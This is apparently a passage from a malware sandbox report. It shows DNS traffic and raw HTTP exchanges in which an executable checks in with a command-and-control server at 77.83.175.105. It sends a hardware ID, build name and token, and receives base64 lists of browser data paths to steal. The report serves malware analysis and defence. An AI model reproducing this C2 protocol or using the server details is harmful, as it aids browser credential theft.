                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.780706882 CET4434995713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.781008005 CET49957443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.781172037 CET49957443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.781184912 CET4434995713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:48.941534042 CET4434994813.107.246.60192.168.2.5

                                                                                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.484133959 CET192.168.2.51.1.1.10x2829Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.484982014 CET192.168.2.51.1.1.10x407cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:13.531280041 CET192.168.2.51.1.1.10xd8b7Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:13.531732082 CET192.168.2.51.1.1.10xfedcStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.534998894 CET192.168.2.51.1.1.10x51Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.535427094 CET192.168.2.51.1.1.10xedb2Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.496438980 CET192.168.2.51.1.1.10xbb63Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.496711016 CET192.168.2.51.1.1.10x60ddStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.957037926 CET192.168.2.51.1.1.10x2c08Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.957196951 CET192.168.2.51.1.1.10x3921Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.417476892 CET192.168.2.51.1.1.10x9deStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.417604923 CET192.168.2.51.1.1.10x6ea4Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.439378977 CET192.168.2.51.1.1.10x853aStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.439678907 CET192.168.2.51.1.1.10x2ed6Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.447495937 CET192.168.2.51.1.1.10xdbbcStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.447678089 CET192.168.2.51.1.1.10xe076Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.453332901 CET192.168.2.51.1.1.10xe2c7Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.453484058 CET192.168.2.51.1.1.10x2977Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.087909937 CET192.168.2.51.1.1.10x7b04Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.088059902 CET192.168.2.51.1.1.10xa865Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.161412954 CET192.168.2.51.1.1.10x6979Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.163191080 CET192.168.2.51.1.1.10x1caStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.163965940 CET192.168.2.51.1.1.10x52bcStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.164127111 CET192.168.2.51.1.1.10xebceStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.172633886 CET192.168.2.51.1.1.10x61bcStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.172858953 CET192.168.2.51.1.1.10x541dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.918792009 CET192.168.2.51.1.1.10xcaa1Standard query (0)campuspersever.esA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.494107008 CET1.1.1.1192.168.2.50x2829No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.494122028 CET1.1.1.1192.168.2.50x407cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:13.539081097 CET1.1.1.1192.168.2.50xd8b7No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:13.539081097 CET1.1.1.1192.168.2.50xd8b7No error (0)plus.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:13.540330887 CET1.1.1.1192.168.2.50xfedcNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.543174028 CET1.1.1.1192.168.2.50x51No error (0)play.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.771990061 CET1.1.1.1192.168.2.50xbb63No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.772002935 CET1.1.1.1192.168.2.50x60ddNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.772030115 CET1.1.1.1192.168.2.50x2394No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.772030115 CET1.1.1.1192.168.2.50x2394No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:21.772073030 CET1.1.1.1192.168.2.50xe21eNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.966190100 CET1.1.1.1192.168.2.50x3921No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.966734886 CET1.1.1.1192.168.2.50x2c08No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.426259041 CET1.1.1.1192.168.2.50x9deNo error (0)sb.scorecardresearch.com18.239.83.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.426259041 CET1.1.1.1192.168.2.50x9deNo error (0)sb.scorecardresearch.com18.239.83.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.426259041 CET1.1.1.1192.168.2.50x9deNo error (0)sb.scorecardresearch.com18.239.83.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.426259041 CET1.1.1.1192.168.2.50x9deNo error (0)sb.scorecardresearch.com18.239.83.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.446731091 CET1.1.1.1192.168.2.50x853aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.451472998 CET1.1.1.1192.168.2.50x2ed6No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.455703974 CET1.1.1.1192.168.2.50xe076No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.456458092 CET1.1.1.1192.168.2.50xdbbcNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.460671902 CET1.1.1.1192.168.2.50xe2c7No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.461298943 CET1.1.1.1192.168.2.50x2977No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.097192049 CET1.1.1.1192.168.2.50x7b04No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.097192049 CET1.1.1.1192.168.2.50x7b04No error (0)googlehosted.l.googleusercontent.com142.250.184.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.097964048 CET1.1.1.1192.168.2.50xa865No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.170836926 CET1.1.1.1192.168.2.50x6979No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.170836926 CET1.1.1.1192.168.2.50x6979No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171021938 CET1.1.1.1192.168.2.50x1caNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171907902 CET1.1.1.1192.168.2.50x52bcNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171907902 CET1.1.1.1192.168.2.50x52bcNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.172822952 CET1.1.1.1192.168.2.50xebceNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.180458069 CET1.1.1.1192.168.2.50x61bcNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.180458069 CET1.1.1.1192.168.2.50x61bcNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.180826902 CET1.1.1.1192.168.2.50x541dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:46.972311974 CET1.1.1.1192.168.2.50xcaa1No error (0)campuspersever.es87.106.236.48A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                0192.168.2.54970677.83.175.105803552C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:00.437035084 CET88OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.268872976 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:01 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.308146000 CET417OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDA
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 217
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 36 34 38 34 35 38 34 32 37 37 31 37 35 38 31 38 38 36 38 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="hwid"A664845842771758188687------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="build"LogsDiller------FHIIEHJKKECGCBFIIJDA--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.599903107 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:01 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 180
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 5a 6a 56 6a 5a 6d 55 78 4d 6d 49 78 4e 32 59 78 4f 47 4a 6b 4e 44 55 31 5a 54 6c 6a 4d 54 64 6a 4e 7a 59 34 4d 6a 55 7a 4d 57 45 31 4e 57 4a 6b 5a 6a 67 31 5a 44 59 35 4d 6a 67 7a 4d 44 68 68 4e 32 56 6d 5a 44 55 32 59 54 4d 79 4e 54 49 77 4d 6d 45 31 5a 6a 41 34 5a 6a 56 6c 59 7a 4d 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: ZjVjZmUxMmIxN2YxOGJkNDU1ZTljMTdjNzY4MjUzMWE1NWJkZjg1ZDY5MjgzMDhhN2VmZDU2YTMyNTIwMmE1ZjA4ZjVlYzMwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.616643906 CET468OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="message"browsers------HDAAAAFIIJDBGDGCGDAK--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.859536886 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:01 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 2064
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.859551907 CET1056INData Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47
                                                                                                                                                                                                                                                                                                                                Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXI
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:01.861154079 CET467OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="message"plugins------CBGCAFIIECBFIDHIJKFB--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:02.104195118 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:01 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 7116
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
